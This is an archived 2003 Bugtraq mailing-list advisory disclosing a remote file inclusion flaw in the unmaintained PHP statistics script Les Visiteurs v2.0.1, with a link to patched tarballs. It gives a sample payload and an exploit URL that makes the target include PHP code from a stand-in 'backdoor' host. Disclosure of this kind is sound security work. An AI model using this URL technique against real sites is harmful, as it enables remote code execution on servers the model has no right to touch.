| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 26 Oct 2003 01:45:52 -0000 From: Matthieu Peschaud <bugtrack@...zwam.net> To: bugtraq@...urityfocus.com Subject: Les Visiteurs v2.0.1 code injection vulnerability Les Visiteurs is a great statistics script written in php. It gives you some graphicals informations on visitors of your website. This script was distributed by phpinfo.net but is no more maintained since a year. --------- In this version severals unprotected includes can be found in files: - include/config.inc.php - include/new-visitor.inc.php It is possible to include a php file from a backdoor server, and execute it on the target's server. You just have to create on the backdoor srv these files: - lang/<lang>.inc.php - db/db_mysql.inc.php fill one with something like: <? echo '<? echo "<br><br>included from backdoor server :p<br>"; ?>'; ?> and call an url as: http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/ --------- Because the script is not maintained and will not be patched, i make some tarballs with a patched version. You will find it at this url: http://chezwam.net/main/publications/lesvisiteurs/ Matthieu Peschaud Epita - France
Powered by blists - more mailing lists